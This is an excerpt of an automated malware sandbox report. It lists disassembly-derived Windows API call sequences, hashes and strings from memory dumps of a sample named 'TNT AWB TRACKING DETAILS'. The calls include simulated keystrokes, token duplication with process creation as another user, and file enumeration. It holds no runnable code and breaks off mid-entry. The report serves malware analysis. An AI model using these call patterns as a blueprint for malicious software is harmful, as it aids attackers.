                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __lock_file
                                      • String ID:
                                      • API String ID: 3031932315-0
                                      APIs
                                        • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                        • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                        • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                      • VariantClear.OLEAUT32(?), ref: 0047973E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Clear$CopyInit
                                      • String ID:
                                      • API String ID: 24293632-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction ID: 593cc08aea61bd92783624a22afab0ec69b4970239d1bd055cec468a63b451cd
                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                      • Instruction Fuzzy Hash: 25E0BF7494020DEFDB00EFE8D5496DE7BB4EF04301F1005A1FD05D7681DB309E548A62
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 03F3BB21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 3a71d38ac47c800ba5bc3ca39d670df1f87d71165537f08fa66b03912eeda841
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 82E0E67494020DDFDB00EFF8D54969E7FB4EF04301F1001A1FD05D2281DA309D508A62
                                      APIs
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                      • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                      • GetKeyState.USER32(00000011), ref: 0047C92D
                                      • GetKeyState.USER32(00000009), ref: 0047C936
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                      • GetKeyState.USER32(00000010), ref: 0047C953
                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                      • _wcsncpy.LIBCMT ref: 0047CA29
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                      • SendMessageW.USER32 ref: 0047CA7F
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                      • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                      • ImageList_SetDragCursorImage.COMCTL32(00BE8EF8,00000000,00000000,00000000), ref: 0047CB9B
                                      • ImageList_BeginDrag.COMCTL32(00BE8EF8,00000000,000000F8,000000F0), ref: 0047CBAC
                                      • SetCapture.USER32(?), ref: 0047CBB6
                                      • ClientToScreen.USER32(?,?), ref: 0047CC17
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                      • ReleaseCapture.USER32 ref: 0047CC3A
                                      • GetCursorPos.USER32(?), ref: 0047CC72
                                      • ScreenToClient.USER32(?,?), ref: 0047CC80
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                      • SendMessageW.USER32 ref: 0047CD12
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                      • SendMessageW.USER32 ref: 0047CD80
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                      • GetCursorPos.USER32(?), ref: 0047CDC8
                                      • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                      • GetParent.USER32(00000000), ref: 0047CDF7
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                      • SendMessageW.USER32 ref: 0047CE93
                                      • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,030D1B60,00000000,?,?,?,?), ref: 0047CF1C
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                      • SendMessageW.USER32 ref: 0047CF6B
                                      • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,030D1B60,00000000,?,?,?,?), ref: 0047CFE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3100379633-4164748364
                                      • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                      • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                      • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00434420
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                      • IsIconic.USER32(?), ref: 0043444F
                                      • ShowWindow.USER32(?,00000009), ref: 0043445C
                                      • SetForegroundWindow.USER32(?), ref: 0043446A
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                      • GetCurrentThreadId.KERNEL32 ref: 00434485
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                      • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                      • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                      • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                      • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                      • keybd_event.USER32(00000012,00000000), ref: 00434514
                                      • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                      • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 2889586943-2988720461
                                      • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                      • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                      • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                      APIs
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                      • CloseHandle.KERNEL32(?), ref: 004463A0
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                      • GetProcessWindowStation.USER32 ref: 004463D1
                                      • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                      • _wcslen.LIBCMT ref: 00446498
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • _wcsncpy.LIBCMT ref: 004464C0
                                      • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                      • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                      • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                      • CloseWindowStation.USER32(00000000), ref: 0044656C
                                      • CloseDesktop.USER32(?), ref: 0044657A
                                      • SetProcessWindowStation.USER32(?), ref: 00446588
                                      • CloseHandle.KERNEL32(?), ref: 00446592
                                      • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                      • String ID: $@OH$default$winsta0
                                      • API String ID: 3324942560-3791954436
                                      • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                      • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                      • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                      • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                      • FindClose.KERNEL32(00000000), ref: 00478924
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                      • __swprintf.LIBCMT ref: 004789D3
                                      • __swprintf.LIBCMT ref: 00478A1D
                                      • __swprintf.LIBCMT ref: 00478A4B
                                      • __swprintf.LIBCMT ref: 00478A79
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                        • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                      • __swprintf.LIBCMT ref: 00478AA7
                                      • __swprintf.LIBCMT ref: 00478AD5
                                      • __swprintf.LIBCMT ref: 00478B03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 999945258-2428617273
                                      • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                      • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                      • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                      • __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcscpy.LIBCMT ref: 004034A7
                                      • _wcscat.LIBCMT ref: 004034BC
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                      • _wcscpy.LIBCMT ref: 004035A0
                                      • _wcslen.LIBCMT ref: 00403623
                                      • _wcslen.LIBCMT ref: 0040367D
                                      Strings
                                      • Unterminated string, xrefs: 00428348
                                      • _, xrefs: 0040371C
                                      • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                      • Error opening the file, xrefs: 00428231
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                      • API String ID: 3393021363-188983378
                                      • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                      • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                      • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                      • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                      • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                      • FindClose.KERNEL32(00000000), ref: 00431B20
                                      • FindClose.KERNEL32(00000000), ref: 00431B34
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                      • FindClose.KERNEL32(00000000), ref: 00431BCD
                                      • FindClose.KERNEL32(00000000), ref: 00431BDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                      • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                      • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                      • __swprintf.LIBCMT ref: 00431C2E
                                      • _wcslen.LIBCMT ref: 00431C3A
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                      • String ID: :$\$\??\%s
                                      • API String ID: 2192556992-3457252023
                                      • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                      • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                      • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                      • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 004722A2
                                      • __swprintf.LIBCMT ref: 004722B9
                                      • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                      • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                      • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                      • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                      • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                      • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                      • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                      • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                      • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FolderPath$LocalTime__swprintf
                                      • String ID: %.3d
                                      • API String ID: 3337348382-986655627
                                      • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                      • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                      • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                      • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                      • FindClose.KERNEL32(00000000), ref: 0044291C
                                      • FindClose.KERNEL32(00000000), ref: 00442930
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                      • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                      • FindClose.KERNEL32(00000000), ref: 004429D4
                                        • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                      • FindClose.KERNEL32(00000000), ref: 004429E2
                                      Strings
                                      Memory Dump Source
